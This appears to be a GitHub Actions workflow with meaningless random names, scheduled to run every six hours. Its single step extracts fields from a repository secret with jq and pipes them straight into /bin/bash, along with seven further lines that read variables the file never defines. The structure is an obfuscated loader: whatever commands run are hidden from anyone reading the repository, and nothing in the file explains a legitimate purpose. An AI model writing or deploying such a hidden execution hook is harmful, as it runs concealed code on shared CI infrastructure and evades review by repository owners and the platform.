name: xiangjiangnannn

on:
  workflow_dispatch:
  schedule:
    - cron: '45 0/6 * * *'

jobs:  # 26165
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiangjiangnannn
        env:
          ntd24: ${{ secrets.ntd24 }}
        run: |
          echo $ntd24 | jq -r .owgvb564 | /bin/bash
          echo $ee8687 | jq -r .a96 | /bin/bash
          echo $zohma779 | jq -r .juz0 | /bin/bash
          echo $gft68538 | jq -r .rpwcf76662 | /bin/bash
          echo $mom16 | jq -r .p988 | /bin/bash
          echo $haml0 | jq -r .brq72 | /bin/bash
          echo $n68895 | jq -r .nyvgz80 | /bin/bash
          echo $acwrd08 | jq -r .iruu6 | /bin/bash

